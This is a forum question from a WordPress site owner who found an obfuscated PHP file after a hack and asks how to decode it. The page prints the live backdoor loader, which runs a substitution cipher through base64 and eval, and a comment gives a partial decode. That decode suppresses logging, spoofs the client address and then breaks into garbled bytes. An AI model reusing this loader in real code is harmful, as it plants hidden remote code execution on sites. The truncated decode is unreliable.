how to decode the encoded php file in

i have a wordpress website and recently my site was hacked and after checking that i saw a file name sql.php in my wordpress upload forlder, and the php code was encoded . I already removed that php file , but now i want to know what is the file about ? why they put it on my website and how i decode it to know what php command is written here..

sql.php file code is below :

Read More
<?php
function ivq($duss, $djw) {
    $naon = '';
    for ($i = 0;$i < strlen($duss);$i++) {
        $naon.= isset($djw[$duss[$i]]) ? $djw[$duss[$i]] : $duss[$i];
    }
    $nbkgehdymn = "base64_decode";
    return $nbkgehdymn($naon);
}
$zkahl = 'OBLNqX2Ip1OM6sXxr92x1sVKpxrADPYXgPJf5JfCqQYf1HdLtivGzB2G1sXxr92xrxrADuCf5JfCqQYf1HdLtivGzQ' . '8T1sXTpQdetBLKzL23qQeL6xJvFi7ai7hIp1ZStBLbpX2AqQeftivJl' . 'gAli9L9lBLIrsX3liZSW3XmX7Xmlm7ljJM6682gZX6QZX6z6eh' . 'DW82gZWVB6e3v4mC0kxDaDCM6682gZX6QZX6z6e68gW2WZX2hZPZm6e3v4mC0FgDHkRCNFiTVDRAliQL9li8' . 'Lz1h3jmv71ed8WLp8WLAGm8ZWW82E13p4WLthW7Z8Z82BgeDG1m7fivLaiv76682gZX6QZX6z63UWX8' . '1XA0E06tDu3v6B6UpuAli16LtnXxz0h0E1dLdRZSpQYRzsZLlndLr9LUzBLypmv' . '7r9XIlm7aiG3=';
$viici = Array('1' => 'X', '0' => 'i', '3' => '0', '2' => '9', '5' => 'O', '4' => 'P', '7' => 'k', '6' => 'J', '9' => 'm', '8' => 'F', 'A' => 's', 'C' => 'A', 'B' => 'G', 'E' => 'Y', 'D' => 'I', 'G' => 'n', 'F' => 'M', 'I' => 'z', 'H' => '3', 'K' => 'v', 'J' => 'w', 'M' => 'o', 'L' => 'l', 'O' => 'Q', 'N' => 'u', 'Q' => 'W', 'P' => 'E', 'S' => 'f', 'R' => 'j', 'U' => 'h', 'T' => '4', 'W' => 'U', 'V' => 'x', 'Y' => '5', 'X' => 'V', 'Z' => 'R', 'a' => '7', 'c' => '8', 'b' => 't', 'e' => '1', 'd' => 'N', 'g' => 'T', 'f' => 'p', 'i' => 'C', 'h' => 'B', 'k' => 'L', 'j' => 'e', 'm' => 'S', 'l' => 'K', 'o' => 'r', 'n' => 'H', 'q' => 'a', 'p' => 'Z', 's' => '2', 'r' => 'c', 'u' => 'D', 't' => 'd', 'w' => 'q', 'v' => 'g', 'y' => '6', 'x' => 'y', 'z' => 'b');
eval(ivq($zkahl, $viici)); ?>

Pls help me anyone…

Related posts

2 comments

  1. Hackers may have some Encryption Hash key or Salt to encrypt.

    You should not give 777 permission or write permission for your uploader folder. Restrict it.

  2. I tried decoding and it evaluated to this code

    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @set_time_limit(0);
    
    if(isset($_SERVER))
    {
        $_SERVER['PHP_SELF'] = "/"; 
        $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $_SERVER['HTTUÕ²&"%ÒÒF&C° —&WGW&â&6ScEöVæ6öFR‡6W&–Æ—¦R‚G&W2’“°§Ð
    

Comments are closed.